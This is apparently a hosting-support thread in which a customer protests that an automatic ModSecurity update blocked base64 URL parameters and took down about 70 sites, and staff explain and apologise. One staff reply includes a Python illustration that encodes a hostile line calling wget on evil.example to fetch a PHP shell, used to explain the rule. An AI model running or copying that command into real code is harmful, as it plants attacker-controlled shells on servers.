Unbelievable, all our sites across two dedicated servers were down (still are down)

How can Westhost make changes to both our dedicated servers that cause ALL our websites to lose their stylesheets and, in effect, take the sites down? We talked to level 1 support two hours ago, we put in an emergency ticket, and after ZERO action I had to call to talk to a tech and literally tell him what the problem was!

I spoke with the (I assume) level 1 tech, explaining that this looked like a mod_security issue because we pass a base64-encoded URL parameter to a PHP file that generates our stylesheets. Those requests are all now returning a 403 Forbidden error. After placing me on hold for a couple of minutes, the level 1 tech told me it was not a mod_security issue. I told him he was wrong; it was DEFINITELY a mod_security issue. A few more minutes on hold and he came back to tell me it's a mod_security issue.

Apparently mod_security updates its rules automatically, like an anti-virus program. We did not know about this; nobody told us, nobody warned us, and it's not in any documentation, any agreement we signed, or any order sheet. This auto-update took down all our sites (everything was working fine yesterday). In the last hour we've lost 4 client accounts over this, at $4,000 per year EACH. The issue is STILL NOT RESOLVED.

THIS IS COMPLETELY UNACCEPTABLE. How can changes be made to our dedicated servers, without our knowledge, that take down all our revenue-generating sites?

Six hours after our initial customer service contact, a Level 2 tech contacted us via email on the ticket system, asking for account validation and referencing a single site versus the 70 sites on both dedicated servers. I called customer service (my 4th call in 2 hours) and had them patch me through to the Level 2 tech. He told me that every single domain would need a mod_security exception and that it would take 1.5-2 hours if he was not interrupted by something like a "server going down". To which I responded: OUR SERVERS ARE ESSENTIALLY DOWN. ALL SITES. We've now officially lost 5 of our business clients, representing $20,000 ANNUALLY, as we host a subscription B2B web app here.

I want to know: what is Westhost going to do about this? We're still down, our staff's phones have been lit up for 6 hours, and we've received almost 300 emails from our customers wanting to know what happened and when it will be back up (to which we have had no answer, as we could not get one from Westhost). We've lost customers, money, and reputation. We paid for dedicated servers running the same codebase we've used for almost 8 years. What NOW? I am beside myself in anger and frustration. THIS IS THE WORST BUSINESS DISASTER in the history of our company.

As I stated on the phone, I apologize for the inconvenience and problems this ModSecurity update caused you. We did make the exceptions you requested.

To answer your question as to how we can make changes to your dedicated servers without notifying you: you purchased a managed server, meaning you wanted us to take care of all the server-side details, including security. If you had not wanted us to take care of these things for you, you would have purchased an unmanaged server. As part of preserving server security, we implement ModSecurity rules, which change and update as new threats are discovered. If websites trigger these rules, then once we have been notified we evaluate what is triggering the rule and what the rule is meant to block. In some instances we make exceptions to these rules on a per-directory basis, so as to minimize the threat to the account.

In this instance, the rule was blocking the base64 strings included in your URLs. The reason is that it is very simple for a hacker to encode a malicious set of instructions in base64 and pass them to one of your pages, causing that site to execute whatever is in the base64 string: uploading a shell (one of the most common attacks), initiating an attack on another site (also very common), or starting to send spam. You would have no way to stop them, as the door would already be open.
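To illustrate the firewall's dilemma, here is a minimal sketch (Python; the parameter contents are invented for this example and are not taken from your actual site) of why a generic rule cannot distinguish a legitimate encoded parameter from a hostile one:

```python
import base64

# Hypothetical legitimate parameter: the site base64-encodes a
# stylesheet configuration string before putting it in the URL.
legit = base64.b64encode(b"theme=blue;width=960").decode()

# A hostile request encodes attack instructions in exactly the same way.
hostile = base64.b64encode(b"system('wget http://evil.example/shell.php');").decode()

# To a firewall rule, both are opaque base64 blobs in a URL; it cannot
# tell the stylesheet request from the payload without decoding it and
# understanding the application, so a generic rule blocks the pattern.
print("legit:  ", legit)
print("hostile:", hostile)

# Decoding shows what the rule guards against: if the receiving script
# ever passed the decoded string to eval() or a shell, the attacker
# would control the server.
assert base64.b64decode(hostile).startswith(b"system(")
```

This is why the rule fires on the encoding itself rather than on the decoded content.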

This issue did not come to light on the older Site Manager system because we left more of the security to you, the client. On the newer cPanel platform, however, we have taken on more of the security aspect of the accounts. We apologize for any frustration this may cause. Ultimately, we have seen a large decrease in hacked sites and accounts since taking this on, which indicates to us that what we are doing is working and is worth whatever other usability issues may arise.

I hope this answers your questions and resolves some of your concerns. If you have any other questions or concerns, please feel free to respond to your ticket and I will be more than happy to address them.

Explain something, then.

We've been on this generation of server for many months, running the same codebase. Not the last generation, the current one. Is it reasonable that a codebase that has been working for months suddenly stops working, and that every single site on both dedicated servers suddenly stops working properly? How is this reasonable?

Now that the situation has been more or less resolved, the main issue we have is how the support was handled on this incident.

Specifically, we contacted level 1 support immediately (8am your time), and the tech told us he would create a ticket on our behalf and escalate it, seeing as all our sites were down. We heard nothing for an hour. We put in a high-priority ticket at 9am your time. We've spoken to five separate level 1 customer support people, in addition to the ticket, trying to get someone to help us with this situation. Nearly 5.5 hours after we noticed there was a problem, and 4.5 hours after the high-priority ticket, was the first time you saw or touched the ticket.

The first email we got from you asked about account validation. Perhaps that could have been handled by level 1 support within the first 5 hours, or at our initial contact at 8am your time. Then you sent me an email asking about the "specific problem", which I had outlined in the ticket with explicit details, including examples of how to make the problem appear and disappear using specific URLs, showing how the parameters caused mod_security to give us a 403 Forbidden error.

The email I got back had this paragraph:

Before I can add exceptions for the rest of the accounts, I will need to also obtain error messages for every domain that is experiencing this problem. To do so, I will need to replicate the problem. In order for me to replicate the problem, I will need to get step-by-step instructions on how to recreate the problem, including any required login information, for each, and every, domain that is experiencing these issues.

I caused enough of an issue with Steve (level 1 tech) that he patched me directly through to you on the phone, because I thought I had outlined the issue very explicitly. I can post the entire ticket here, with timestamps, including our correspondence, if you wish.

In our phone call, you reiterated that you needed to know the exact nature of the problem, that I would have to supply the username/password for every domain affected (even though it was all of them), and that I would have to give specific examples of each problem on each domain. I explained that it was all in the ticket, and on the phone we went through it so that you understood the problem. Your quote to me on the phone was "this is on every domain?", which had been CLEARLY indicated hours earlier in the ticket, SEVERAL TIMES, prior to our phone conversation.

If I did not have prior experience dealing with this specific issue, I don't know how long this resolution would have taken. I had to explain it to the Level 1 techs (each one, because each tech goes through the same exact script I had gone through 15 minutes earlier with the previous tech, aside from Steve, who is your best, IMHO). I also had to explain the issue to you, because it wasn't an error per se but the result of the mod_security ruleset.

After agreeing on a course of action, you said that if your workload was uninterrupted it would take 1.5-2 hours to go through every domain and make the exceptions, unless you were interrupted by a server going down or something similar. To which I replied: "What do you think we are going through now? ALL OUR DOMAINS ARE DOWN. How is this not the same as a server going down?"

A few minutes after our conversation ended, as I was watching the ticket, it was marked RESOLVED. The sites were still all down. I called customer service, pretty much went off the chain, and they said they messaged you. You messaged us back saying it was an error and that you had closed the wrong ticket. Okay, I understand that happens, but it didn't help the situation.

At approximately 8:45pm your time (just under 12 hours after our high-priority ticket was submitted), the domains were back online. (And thank you for being prompt once we actually got the issue in front of you, Reed.)

So after causing hell on earth for our own customer service department and losing customers (thankfully we may be able to recover these by explaining the scenario today), I'm hearing you say that it's basically our fault and that Westhost is blameless in this situation.

We have been customers of Westhost since 2004. We've suffered through the outage fiasco in 2010 where everything went down horribly for all Westhost customers for 48+ hours. It's not like we aren't loyal customers.

I understand things go wrong from time to time, but seriously, this "customer support" that is supposed to come with "managed servers" has left us faithless. Dedicated server customers are treated no differently from shared hosting customers. We are paying 1.5x to 2x what other webhosts (who rank higher on several metrics) charge for the same dedicated server specification (or better).

I'll end this by saying we went to you guys because you used to be at the top of the game. When we first started with you the customer support was immediate and FAST. In 2006 you were in the top 10 (maybe top 5) of every webhost ranking. You've won awards for several years after that. You famously advertised that Netcraft ranked you #1 I believe in 2008. Today you aren't even on the lists including Netcraft. Whether this is because your competitors outpaced you or that you slipped due to transitions/buyout/whatever, it should be clear that this isolated incident isn't the reason.

I want to make sure that we have things worked out for you, and I do apologize for the frustration caused by the ModSecurity rule and the course of action that we took in working on this issue for you.

It sounds like you had a number of different calls, and perhaps a number of different tickets, on this same issue. I know that having multiple support requests on the same issue can result in partial information reaching different technicians, causing delays or confusion in the overall response time. I apologize for the frustration that caused, and I will definitely work with my team to make improvements, namely on communication, so our support can be more effective.

With ModSecurity, updates can occur at any time; we usually apply them every couple of weeks across all the servers we maintain. As mentioned, these tools are put in place for our shared and managed hosting solutions to relieve some of the stress of security management for your hosting service. They are not intended to be a hurdle to site performance, but in this instance a new trigger, matching the coding of your site, effectively brought services to a stop. We can definitely work with our administrative teams to see what we can do in such situations to resolve the issue more rapidly while still providing a similar level of security.

ModSecurity is implemented in such a way that we add exceptions to rules based on the cPanel user and the directory or specific file where the error occurs. This can definitely slow down a resolution when there are many sites affected by a single trigger, or a variety of different folders where the exception needs to be added. Reed was able to have our admins write a quick script to automatically go through and get all of those exceptions added across your servers, though it still took some time to configure and complete.
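For reference, a per-directory exception of the kind the script applied typically looks something like the following (a sketch assuming Apache with ModSecurity 2.x; the path and rule ID are placeholders, and the real ID would come from the audit log entry for the blocked request):

```apache
<Directory "/home/exampleuser/public_html">
    <IfModule mod_security2.c>
        # Disable only the specific rule that matched the base64
        # parameter, leaving the rest of the ruleset active for
        # everything else in this directory.
        SecRuleRemoveById 912345
    </IfModule>
</Directory>
```

Because each exception is scoped to one user and directory, many affected sites means many such stanzas, which is what the script automated.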

I hope that you do not take Reed's response as an attempt to deflect blame, though we can definitely present such information more effectively for better understanding on both sides of the conversation. In explaining how things work, and Reed's view of how the situation unfolded, we wanted to make sure you knew why ModSec was in place, why it behaved the way it did, and how we were able to provide support.
I appreciate our relationship with you and want to be sure we are able to continue that for as long as we provide service. We are continually growing and working to provide the premium support that we have over the many years we've been in business.

I will follow up with you through your ticket and give you a call back, per your request. I am hopeful that I will be able to provide you some more meaningful information as well as a satisfactory course of action.